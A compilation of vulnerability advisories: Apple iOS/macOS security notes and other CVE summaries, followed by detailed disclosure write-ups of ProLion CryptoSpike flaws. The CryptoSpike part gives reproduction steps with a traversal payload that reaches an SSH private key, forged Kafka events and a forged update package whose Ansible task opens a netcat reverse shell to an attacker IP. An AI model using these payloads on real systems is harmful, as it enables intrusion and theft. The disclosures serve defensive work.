Due to lack of proper authorization checks in Emarsys SDK for Android, an attacker can call a particular activity and can forward himself web pages and/or deep links without any validation directly from the host application. On successful attack, an attacker could navigate to arbitrary URL including application deep links on the device.



CVE-2023-6542

SAP Cloud Connector - version 2.0, allows an authenticated user with low privilege to perform Denial of service attack from adjacent UI by sending a malicious request which leads to low impact on the availability and no impact on confidentiality or Integrity  of the application.



CVE-2023-49578

A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.2, iOS 17.2 and iPadOS 17.2, watchOS 10.2. An app may be able to access sensitive user data.

Released December 11, 2023

**Accounts**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access sensitive user data

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-42919: Kirin (@Pwnrin)

**AVEVideoEncoder**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to disclose kernel memory

Description: This issue was addressed with improved redaction of sensitive information.

CVE-2023-42884: an anonymous researcher

**Bluetooth**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: An attacker in a privileged network position may be able to inject keystrokes by spoofing a keyboard

Description: The issue was addressed with improved checks.

CVE-2023-45866: Marc Newlin of SkySafe

Entry added December 11, 2023

**ExtensionKit**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access sensitive user data

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-42927: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

**Find My**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to read sensitive location information

Description: This issue was addressed with improved redaction of sensitive information.

CVE-2023-42922: Wojciech Regula of SecuRing (wojciechregula.blog)

**ImageIO**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: Processing an image may lead to arbitrary code execution

Description: The issue was addressed with improved memory handling.

CVE-2023-42898: Junsung Lee

CVE-2023-42899: Meysam Firouzi @R00tkitSMM and Junsung Lee

**Kernel**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to break out of its sandbox

Description: The issue was addressed with improved memory handling.

CVE-2023-42914: Eloi Benoist-Vanderbeken (@elvanderb) of Synacktiv (@Synacktiv)

**Safari Private Browsing**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: Private Browsing tabs may be accessed without authentication

Description: This issue was addressed through improved state management.

CVE-2023-42923: ARJUN S D

**Siri**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: An attacker with physical access may be able to use Siri to access sensitive user data

Description: The issue was addressed with improved checks.

CVE-2023-42897: Andrew Goldberg of The McCombs School of Business, The University of Texas at Austin (linkedin.com/andrew-goldberg-/)

**WebKit**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: Processing web content may lead to arbitrary code execution

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 259830  
CVE-2023-42890: Pwn2car

**WebKit**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: Processing an image may lead to a denial-of-service

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 263349  
CVE-2023-42883: Zoom Offensive Security Team

CVE-2023-42927: About the security content of iOS 17.2 and iPadOS 17.2

A logic issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.2, macOS Ventura 13.6.3, macOS Monterey 12.7.2. An app may be able to access protected user data.

Released December 11, 2023

**Accounts**

Available for: macOS Ventura

Impact: An app may be able to access sensitive user data

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-42919: Kirin (@Pwnrin)

**AppleEvents**

Available for: macOS Ventura

Impact: An app may be able to access information about a user's contacts

Description: This issue was addressed with improved redaction of sensitive information.

CVE-2023-42894: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

**Archive Utility**

Available for: macOS Ventura

Impact: An app may be able to access sensitive user data

Description: A logic issue was addressed with improved checks.

CVE-2023-42924: Mickey Jin (@patch1t)

**AVEVideoEncoder**

Available for: macOS Ventura

Impact: An app may be able to disclose kernel memory

Description: This issue was addressed with improved redaction of sensitive information.

CVE-2023-42884: an anonymous researcher

**CoreServices**

Available for: macOS Ventura

Impact: A user may be able to cause unexpected app termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2023-42886: Koh M. Nakagawa (@tsunek0h)

**Find My**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: This issue was addressed with improved redaction of sensitive information.

CVE-2023-42922: Wojciech Regula of SecuRing (wojciechregula.blog)

**ImageIO**

Available for: macOS Ventura

Impact: Processing an image may lead to arbitrary code execution

Description: The issue was addressed with improved memory handling.

CVE-2023-42899: Meysam Firouzi @R00tkitSMM and Junsung Lee

**IOKit**

Available for: macOS Ventura

Impact: An app may be able to monitor keystrokes without user permission

Description: An authentication issue was addressed with improved state management.

CVE-2023-42891: an anonymous researcher

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to break out of its sandbox

Description: The issue was addressed with improved memory handling.

CVE-2023-42914: Eloi Benoist-Vanderbeken (@elvanderb) of Synacktiv (@Synacktiv)

**ncurses**

Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2020-19185

CVE-2020-19186

CVE-2020-19187

CVE-2020-19188

CVE-2020-19189

CVE-2020-19190

**TCC**

Available for: macOS Ventura

Impact: An app may be able to access protected user data

Description: A logic issue was addressed with improved checks.

CVE-2023-42932: Zhongquan Li (@Guluisacat)

**Vim**

Available for: macOS Ventura

Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution

Description: This issue was addressed by updating to Vim version 9.0.1969.

CVE-2023-5344

CVE-2023-42932: About the security content of macOS Ventura 13.6.3

Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution.

Released December 11, 2023

**Accessibility**

Available for: macOS Sonoma

Impact: Secure text fields may be displayed via the Accessibility Keyboard when using a physical keyboard

Description: This issue was addressed with improved state management.

CVE-2023-42874: Don Clarke

**Accounts**

Available for: macOS Sonoma

Impact: An app may be able to access sensitive user data

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-42919: Kirin (@Pwnrin)

**AppleEvents**

Available for: macOS Sonoma

Impact: An app may be able to access information about a user's contacts

Description: This issue was addressed with improved redaction of sensitive information.

CVE-2023-42894: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

**AppleGraphicsControl**

Available for: macOS Sonoma

Impact: Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution

Description: Multiple memory corruption issues were addressed with improved input validation.

CVE-2023-42901: Ivan Fratric of Google Project Zero

CVE-2023-42902: Ivan Fratric of Google Project Zero, and Michael DePlante (@izobashi) of Trend Micro Zero Day Initiative

CVE-2023-42912: Ivan Fratric of Google Project Zero

CVE-2023-42903: Ivan Fratric of Google Project Zero

CVE-2023-42904: Ivan Fratric of Google Project Zero

CVE-2023-42905: Ivan Fratric of Google Project Zero

CVE-2023-42906: Ivan Fratric of Google Project Zero

CVE-2023-42907: Ivan Fratric of Google Project Zero

CVE-2023-42908: Ivan Fratric of Google Project Zero

CVE-2023-42909: Ivan Fratric of Google Project Zero

CVE-2023-42910: Ivan Fratric of Google Project Zero

CVE-2023-42911: Ivan Fratric of Google Project Zero

CVE-2023-42926: Ivan Fratric of Google Project Zero

**AppleVA**

Available for: macOS Sonoma

Impact: Processing an image may lead to arbitrary code execution

Description: The issue was addressed with improved memory handling.

CVE-2023-42882: Ivan Fratric of Google Project Zero

**Archive Utility**

Available for: macOS Sonoma

Impact: An app may be able to access sensitive user data

Description: A logic issue was addressed with improved checks.

CVE-2023-42924: Mickey Jin (@patch1t)

**AVEVideoEncoder**

Available for: macOS Sonoma

Impact: An app may be able to disclose kernel memory

Description: This issue was addressed with improved redaction of sensitive information.

CVE-2023-42884: an anonymous researcher

**Bluetooth**

Available for: macOS Sonoma

Impact: An attacker in a privileged network position may be able to inject keystrokes by spoofing a keyboard

Description: The issue was addressed with improved checks.

CVE-2023-45866: Marc Newlin of SkySafe

**CoreMedia Playback**

Available for: macOS Sonoma

Impact: An app may be able to access user-sensitive data

Description: The issue was addressed with improved checks.

CVE-2023-42900: Mickey Jin (@patch1t)

**CoreServices**

Available for: macOS Sonoma

Impact: A user may be able to cause unexpected app termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2023-42886: Koh M. Nakagawa (@tsunek0h)

**ExtensionKit**

Available for: macOS Sonoma

Impact: An app may be able to access sensitive user data

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-42927: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

**Find My**

Available for: macOS Sonoma

Impact: An app may be able to read sensitive location information

Description: This issue was addressed with improved redaction of sensitive information.

CVE-2023-42922: Wojciech Regula of SecuRing (wojciechregula.blog)

**ImageIO**

Available for: macOS Sonoma

Impact: Processing an image may lead to arbitrary code execution

Description: The issue was addressed with improved memory handling.

CVE-2023-42898: Junsung Lee

CVE-2023-42899: Meysam Firouzi @R00tkitSMM and Junsung Lee

**IOKit**

Available for: macOS Sonoma

Impact: An app may be able to monitor keystrokes without user permission

Description: An authentication issue was addressed with improved state management.

CVE-2023-42891: an anonymous researcher

**Kernel**

Available for: macOS Sonoma

Impact: An app may be able to break out of its sandbox

Description: The issue was addressed with improved memory handling.

CVE-2023-42914: Eloi Benoist-Vanderbeken (@elvanderb) of Synacktiv (@Synacktiv)

**ncurses**

Available for: macOS Sonoma

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2020-19185

CVE-2020-19186

CVE-2020-19187

CVE-2020-19188

CVE-2020-19189

CVE-2020-19190

**SharedFileList**

Available for: macOS Sonoma

Impact: An app may be able to access sensitive user data

Description: The issue was addressed with improved checks.

CVE-2023-42842: an anonymous researcher

**TCC**

Available for: macOS Sonoma

Impact: An app may be able to access protected user data

Description: A logic issue was addressed with improved checks.

CVE-2023-42932: Zhongquan Li (@Guluisacat)

**Vim**

Available for: macOS Sonoma

Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution

Description: This issue was addressed by updating to Vim version 9.0.1969.

CVE-2023-5344

**WebKit**

Available for: macOS Sonoma

Impact: Processing web content may lead to arbitrary code execution

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 259830  
CVE-2023-42890: Pwn2car

**WebKit**

Available for: macOS Sonoma

Impact: Processing an image may lead to a denial-of-service

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 263349  
CVE-2023-42883: Zoom Offensive Security Team

CVE-2023-42926: About the security content of macOS Sonoma 14.2

Directory traversal in the log-download REST API endpoint in ProLion CryptoSpike 3.0.15P2 allows remote authenticated attackers to download host server SSH private keys (associated with a Linux root user) by injecting paths inside REST API endpoint parameters.

Directory traversal in the log-download REST API endpoint in ProLion CryptoSpike 3.0.15P2 allows remote authenticated attackers to download host server SSH private keys (associated with a Linux root user) by injecting paths inside REST API endpoint parameters.  
 

**Introduction**

CryptoSpike allows operators to download logs from the system through a dedicated section of the web management interface. In order to download logs, the web application leverages a REST API endpoint that is vulnerable to Directory Traversal when using as parameter a traversal path (i.e. containing "../"), thus also allowing a malicious user to access confidential data not intended to be downloaded (e.g. private SSH keys that can be used to access all system host servers with highest privileges).

**Steps to reproduce**

To consume the vulnerable REST API endpoint, a valid JWT Bearer Token belonging to a CryptoSpike user is required. For the invocation to succeed, it is required the operator only having a role with the "Logs / DOWNLOAD" permission set to READ.

The REST API endpoint is named /logs/:filename under the "API-Gateway" service on the leader node (https://leaderhostname/api/v1/Server/logs/:filename) and will be invoked using a GET http request.

Specifying a nonexistent filename as :filename parameter will lead the system to return a low level error message containing the absolute path of the required file, thus revealing the potential directory traversal vulnerability on the endpoint:

In order to confirm this, it is possible to send another request with the same filename but with relative path (input string "../downloads/NONEXISTENT" with URL encoding on all special characters), resulting in the same error message, with the same absolute path specified:

This confirms that the API is vulnerable to Directory Traversal attacks. Moreover, by analyzing the relevant Docker container filesystem being accessible via directory traversal, a sensitive file containing an unprotected SSH private key (input string "../../ssh/update_key" URL encoded as %2E%2E%2F%2E%2E%2Fssh%2Fupdate%5Fkey) has been detected, accessible via directory traversal:

By using this private key with an SSH command line client to connect to the host servers of CryptoSpike infrastructure (in the testing environment one Leader server and two Agent servers), the connection is correctly established without inputting a password and a remote shell is obtained as a user with the root privileges:

CVE-2023-36654: CVCN

A SQL Injection in the users searching REST API endpoint in ProLion CryptoSpike 3.0.15P2 allows remote authenticated attackers to read database data via SQL commands injected in the search parameter.

1.  Home
2.  Dettaglio CVE-2023-36652

**CVE-2023-36652**

**Description**

A SQL Injection in the users searching REST API endpoint in ProLion CryptoSpike 3.0.15P2 allows remote authenticated attackers to read database data via SQL commands injected in the search parameter.  
 

**CVE Link****CVSS v3.1****Details**

**Introduction**

The "search" parameter of the "/audit/users" REST API endpoint is vulnerable to SQL Injection attacks. Through this vulnerability it is possible to access, in read-only mode, to an auxiliary database (not the main system database) used by the system, allowing to access details related to the underlying software infrastructure.

**Steps to reproduce**

The API endpoint "/audit/users" of the application service "Auditing", which can be invoked by any authenticated user, is vulnerable to SQL Injection via the "search" parameter. It is possible to access the underlying database in read-only mode (via "mySQL" dialect) using the SQL INJECTION "UNION" technique.

The SQL query must be URL encoded accordingly:

CVE-2023-36652: CVCN

Missing authentication in the internal data streaming system in ProLion CryptoSpike 3.0.15P2 allows remote unauthenticated users to read potentially sensitive information and deny service to users by directly reading and writing data in Apache Kafka (as consumer and producer).

Missing authentication in the internal data streaming system in ProLion CryptoSpike 3.0.15P2 allows remote unauthenticated users to read potentially sensitive information and deny service to users by directly reading and writing data in Apache Kafka (as consumer and producer).  
 

**Introduction**

CryptoSpike leverages the Kafka system in order to communicate the events regarding file access on the NAS storage to the CryptoSpike sub-components involved in the elaboration. By using a Kafka client, it is possible to authenticate on Kafka without authentication from an attacker server and act in _consumer_ or _producer_ mode. In consumer mode it is possible to read from processed events all metadata of operations and files (filename and complete path on the network share, user identifier, date/time, etc.). In producer mode it is even possible to insert forged events that could lead to network shares' users interdiction.

**Steps to reproduce**

The CryptoSpike system is deployed in Active monitoring mode with a configuration consisting of one Leader node and two Agents.

By using the tool "kcat" (also known as Kafka Cat) as client of Kafka service, connect to any one of the Kafka on the CryptoSpike servers in order to find the list of the Kafka "topics":

By connecting through kcat client as _consumer_ without authentication to the Kafka topic **local.cs.fct.file-events.0** on any one of the Kafka services (Leader or Agent), it is possible to capture information about files and storage users. Instead, by connecting as producer it is possible to insert multiple forged events that simulate the file writing of a file with an extension (.YOLO in the example) forbidden by one of the rules. In the next picture, on the left the connection as producer, on the right the connection as consumer:

The fake event written as producer is the following one:

{"eventType":"CREATE","filePath":"/test_FAKE2.YOLO","fileName":"test_FAKE2.YOLO","extension":"YOLO","displayFilePath":"\\\\[REDACTED IP].127\\testshare\\test_FAKE2.YOLO","filePathAfterRename":null,"userId":"S-1-5-21-3279977989-1286463912-761590908-500","userIdType":"WINDOWS","userIp":"[REDACTED IP].127","fileSystemObjectType":"FILE","fileProtocol":"SMB","fileProtocolVersion":"3.1","timestamp":1675681906.343000216,"timestampNano":343000216,"storagePlatform":"ONTAP","clusterId":402,"clusterName":"hq-stor","serverId":502,"serverName":"svm0_cifs","shareId":602,"shareName":"testshare","volumeId":552,"volumeName":"svm0_cifs_root","localAddress":"172.18.0.14","remoteAddress":"[REDACTED IP].55","policyName":"Prolion_CS_POLICY_ACTIVE_cifs","synchronous":true,"accessControlResult":"{\"additionalInformation\":{\"configurationItemId\":\"1552\",\"blockListItem\":\"yolo\"},\"blocked\":true,\"reason\":\"Extension matched.\",\"accessControlType\":\"BLOCK_LIST\",\"userIgnored\":false,\"audited\":true}","accessControlType":"BLOCK_LIST","blocked":true,"userIgnored":false}

All the forged events written from the rogue producer are captured from the system and showed on the management interface of CryptoSpike:

After around one minute of time, the network share user indicated in the forged message is automatically blocked from CryptoSpike, despite this user never executed an operation on the NAS storage:

  

Note: to reproduce the test it is necessary:

*   In case of CIFS shares, the Active Directory instance must be active, and the victim user ID must be known.
*   More than 5 fake messages regarding the fake anomaly must be published to cause the blocking of the user.
*   Each of these 5 messages must have a minimal variation from each one (all the timestamp fields can be set in a way that they are close together and to the current time)

Finally, by inserting as producer inside the Kafka topic a message that is not conforming to expected by CryptoSpike format, it is possible to block the entire system. For example, by sending a JSON with unexpected format ({ "TEST": "TEST" }) or a free text, the storage monitoring function of CryptoSpike is made unavailable. Being the Kafka instances running on the Leader and Agent nodes all synchronized, the unavailability of the service propagates to all the CryptoSpike Event Analyzer containers of the architecture.

cryptoleader:~$ check-services 
=== UNDERREPLICATED SERVICES: 1 ===
REPLICAS   MODE         NAME
0/1        replicated   application\_services\_event\_analyzer

cryptoagent1:/prolion/scripts$ check-services 
=== UNDERREPLICATED SERVICES: 1 ===
REPLICAS   MODE         NAME
0/1        replicated   application\_services\_event\_analyzer

cryptoagent2:/prolion/scripts$ check-services 
=== UNDERREPLICATED SERVICES: 1 ===
REPLICAS   MODE         NAME
0/1        replicated   application\_services\_event\_analyzer

CVE-2023-36648: CVCN

A missing integrity check in the update system in ProLion CryptoSpike 3.0.15P2 allows attackers to execute OS commands as the root Linux user on the host system via forged update packages.

A missing integrity check in the update system in ProLion CryptoSpike3.0.15P2 allows attackers to execute OS commands as the root Linux user on the host system via forged update packages  
 

**Introduction**

The CryptoSpike system provides an update function that can work both in online mode when the server has Internet access, and in offline mode. In the latter case, the software update is performed by uploading in CryptoSpike the update packages released by the vendor in the form of archive files. The operation can be performed through a special section on the management interface or, in alternative, though REST APIs.

It has been verified that the update system in offline mode is unsecure because no authenticity and integrity checks are performed on the update packages released by the vendor, hence a malicious actor can forge the packages before they are loaded on the system. Consequently, it is possible to specify a series of operating system commands inside the update files, that will be executed on all the nodes of the system (leader and agents) with root privileges.

**Steps to reproduce**

Connect to the Cryptospike web management interface (on the Leader node) with an identity having a role including the “Update” permission set to MODIFY, access the “System”, “Update” section where it is possible to upload updates in .tgz format.

The malicious actor modifies an existing update package or prepares one similar to the one expected from the product (i.e., an Ansible descriptor in YAML format, with setup.yml name inside a directory named "bundle") containing two malicious commands, the first one will write a file inside the /tmp/ directory on the filesystem and the second one will open a reverse shell towards an attacker machine:

\---
- name: Hacked script
  hosts: all
  become: yes
  vars:
    # product information
    product\_name: "Product"
    product\_version: "V0.0.0"
    # base directory where the bundle files are located
    target\_dir: "/prolion/packages"
    log\_dir: "/prolion/logs"
    log\_file\_name: "update\_os.log"

  tasks:
    - name: "create a file"
      shell: "echo HACKED > /tmp/HACKED.txt"

    - name: "execute reverse shell"
      shell: "nc \[REDACTED IP\].230 1234 -e /bin/sh" 

On the attacker machine a _netcat_ has been launched in advance in listening mode on the same port specified in the commands inside the update bundle file as in the source above:

After some moments, the Ansible tasks are correctly executed by the update subsystem with root privileges, as shown in the picture below, where the obtained reverse shell allows to verify the root privileges of the running user on the host server (the leader host node, not the container node) and a file owned by root has been written inside /tmp/ directory on the filesystem.

It has also been verified that the Ansible tasks can be run on all the infrastructure nodes (Leader and Agent nodes) and without prior checks on the .tgz archive contents, thus allowing _"zip bomb"_ attacks that would cause a complete crash of the system.

CVE-2023-36650: CVCN

A hard-coded cryptographic private key used to sign JWT authentication tokens in ProLion CryptoSpike 3.0.15P2 allows remote attackers to impersonate arbitrary users and roles in web management and REST API endpoints via crafted JWT tokens.

A hard-coded cryptographic private key used to sign JWT authentication tokens in ProLion CryptoSpike 3.0.15P2 allows remote attackers to impersonate arbitrary users and roles in web management and REST API endpoints via crafted JWT tokens  
 

**Introduction**

The CryptoSpike system installation packages consist of OVA/OVF files that, once deployed on hypervisors, start the installation steps to obtain a running Docker environment.

By analyzing the Docker configuration files and the host server file system, it is verified that the RSA key pair used by the system to sign and verify JWT token is not randomly generated during the system installation/initialization, in fact being hard-coded inside the OVA/OVF packages, thus resulting in JWT token being valid for all customers deployed instances.

**Steps to reproduce**

Deploy the CryptoSpike Leader OVA file two times on a hypervisor and wait until the initial startup sequence is completed.

Connect in SSH to the two running servers and compare the content of the file containing the RSA private key at the path /prolion/config/core_services/auth_service/keys/priv.pem, for example:

As shown in the picture above, the key pair is identical. Despite the private key being encrypted, by analyzing the docker-compose.yml file in the core_services service group, it is possible to find the password which allows to easily decrypt the private key.

Additionally, there is no evidence of a procedure to generate a new private key inside product documentation or inside support scripts in the Leader server file system.

Tag

#auth